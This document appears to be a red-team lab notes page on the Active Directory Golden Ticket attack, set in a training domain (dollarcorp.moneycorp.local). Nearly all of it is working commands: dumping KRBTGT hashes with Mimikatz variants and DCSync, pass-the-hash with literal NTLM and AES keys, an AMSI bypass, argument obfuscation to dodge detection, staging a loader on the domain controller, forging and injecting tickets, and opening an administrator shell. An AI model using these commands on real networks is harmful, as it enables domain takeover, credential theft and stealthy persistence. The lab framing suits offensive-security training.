# Golden Ticket

<figure><img src="https://3740919960-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2F4Am0a4hPyOcUCfhPUAm9%2Fuploads%2FwWPe8HA4gWJWKrlPmUBb%2Fimage.png?alt=media&#x26;token=bd21f40b-d67d-4ca3-b42a-674cae34ebdc" alt=""><figcaption></figcaption></figure>

## Golden Ticket

* Golden Ticket is used for persistence. Compromising a DC is a prerequisite to perform this attack.
* Once we have admin access to DC, the KRBTGT hash is extracted to sign TGT.
* We can forge a TGT (Golden Ticket) by using the KRBTGT hash.
* Since the Golden Ticket is encrypted and signed with the KRBTGT hash, it is seen as legitimate by other domain controllers and services.
* Very noisy as we are accessing DC to extract KRBTGT credentials. To avoid detection, use accounts other than administrator and ensure you check optional arguments like startoffset, etc.

To get KRBTGT hash, execute Mimikatz on DC or DA:

{% code overflow="wrap" %}

```powershell
Invoke-Mimikatz -Command '"lsadump::lsa /patch"' -ComputerName dcorp-dc 

OR 
# DC-Sync to get KRBTGT without needing code execution on target DC.
SafeyKatz.exe "lsadump::dcsync /user:dcorp-dc\krbtgt" "exit"
```

{% endcode %}

{% code overflow="wrap" %}

```powershell
BetterSafetyKatz.exe "kerberos::golden /user:Administrator /domain:dollarcorp.moneycorp.local /sid:SID /aes256:KEY /startoffset:0 /ending:600 /renewmax:10080 /ptt" "exit"
```

{% endcode %}

### Attack in Practice:

**Using PowerShell Remoting and Invoke-Mimi.ps1**

Start a process with DA privs in a elevated shell.

{% code overflow="wrap" %}

```powershell
C:\Windows\System32> C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat

C:\Windows\System32>. C:\AD\Tools\Invoke-Mimi.ps1

C:\Windows\System32> Invoke-Mimi -Command '"sekurlsa::pth /user:svcadmin
/domain:dollarcorp.moneycorp.local /ntlm:b38ff50264b74508085d82c69794a4d8
/run:cmd.exe"'

```

{% endcode %}

As DA, we open a session as dcorp-dc, and disable script logging and AMSI.

{% code overflow="wrap" %}

```powershell
# InviShell
C:\Windows\System32>C:\AD\Tools\InviShell\RunWithRegistryNonAdmin.bat
[snip]

# Enter DC Session
PS C:\Windows\System32> cd C:\AD\Tools
PS C:\AD\Tools> $sess = New-PSSession -ComputerName dcorp-dc
PS C:\AD\Tools> Enter-PSSession $sess

# Bypass AMSI
[dcorp-dc]: PS C:\Users\svcadmin\Documents> S`eT-It`em <AMSI Bypass snip>
[dcorp-dc]: PS C:\Users\svcadmin\Documents> exit

# Invoke-Mimi
PS C:\AD\Tools> Invoke-Command -FilePath .\Invoke-Mimi.ps1 -Session $sess
PS C:\AD\Tools> Enter-PSSession $sess

# Fetch the KRBTGT hashes
[dcorp-dc]: PS C:\Users\svcadmin\Documents> Invoke-Mimi -Command
'"lsadump::lsa /patch"'
```

{% endcode %}

We can also run DCSync attack from the process runnning as DA:

{% code overflow="wrap" %}

```powershell
PS C:\AD\Tools> Invoke-Mimi -Command '"lsadump::dcsync /user:dcorp\krbtgt"'
```

{% endcode %}

Create a Golden Ticket

{% code overflow="wrap" %}

```powershell
PS C:\AD\Tools> Invoke-Mimi -Command '"kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid: S-1-5-21-719815819-3726368948-3917688648 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /id:500 /groups:512 /startoffset:0 /endin:600 /renewmax:10080 /ptt"'
```

{% endcode %}

We can now access filesystem on DC and also get a shell:

```
PS C:\AD\Tools> ls \\dcorp-dc\c$

```

**Using Rubeus, SafetyKatz, or BetterSafetyKatz.exe**

Open CMD and use ArgSplit to encode asktgt.

<pre><code>C:\AD\Tools>ArgSplit.bat
[!] Argument Limit: 180 characters
[+] Enter a string: asktgt
<strong>set "z=t"
</strong>set "y=g"
set "x=t"
set "w=k"
set "v=s"
set "u=a"
set "Pwn=%u%%v%%w%%x%%y%%z%"
</code></pre>

Open an elevated DA cmd by using DA Hash extracted previously:

{% code overflow="wrap" %}

```powershell
C:\AD\Tools\Rubeus.exe %Pwn% /user:svcadmin /aes256:6366243a657a4ea04e406f1abc27f1ada358ccd0138ec5ca2835067719dc7011 /opsec /createnetonly:C:\Windows\System32\cmd.exe /show /ptt

#Copy Loader.exe to DC
echo F | xcopy C:\AD\Tools\Loader.exe \\dcorp-dc\C$\Users\Public\Loader.exe /Y

# Spawn interactive shell for DC
winrs -r:dcorp-dc cmd

# Set up port forwarding
netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=80 connectaddress=172.16.100.72
```

{% endcode %}

Run SafetyKatz to dump KRBTGT hashes and fetch SID

{% code overflow="wrap" %}

```powershell
#Encode lsadump::lsa using ArgSplit
set "z=a"
set "y=s"
set "x=l"
set "w=:"
set "v=:"
set "u=p"
set "t=m"
set "s=u"
set "r=d"
set "q=a"
set "p=s"
set "o=l"
set "Pwn=%o%%p%%q%%r%%s%%t%%u%%v%%w%%x%%y%%z%"

# In elevated DA cmd:
C:\Users\Public\Loader.exe -path http://127.0.0.1:8080/SafetyKatz.exe -args "%Pwn% /patch" "exit"
```

{% endcode %}

Exit from mimikatz and DA shell. From Student cmd, run Rubeus to get the golden ticket. It will also output the command to forge the Golden ticket and inject it in the current process. Add /ptt at the end to inject it in the current process.

{% code overflow="wrap" %}

```powershell
C:\AD\Tools\Loader.exe golden /aes256:154CB6624B1D859F7080A6615ADC488F09F92843879B3D914CBCB5A8C3CDA848 /user:Administrator /id:500 /pgid:513 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /pwdlastset:"11/11/2022 6:33:55 AM" /minpassage:1 /logoncount:3335 /netbios:dcorp /groups:544,512,520,513 /dc:DCORP-DC.dollarcorp.moneycorp.local /uac:NORMAL_ACCOUNT,DONT_EXPIRE_PASSWORD /ptt

#OR run BetterSafetyKatz.exe 
C:\AD\Tools\BetterSafetyKatz.exe "kerberos::golden /User:Administrator /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /startoffset:0 /endin:600 /renewmax:10080 /ptt" "exit"
```

{% endcode %}

Finally, we can use winrs to login to dcorp-dc from Student.

```
C:\AD\Tools>winrs -r:dcorp-dc cmd

Microsoft Windows [Version 10.0.20348.2227]
(c) Microsoft Corporation. All rights reserved.
C:\Users\Administrator>set username
set username
USERNAME=Administrator
```

##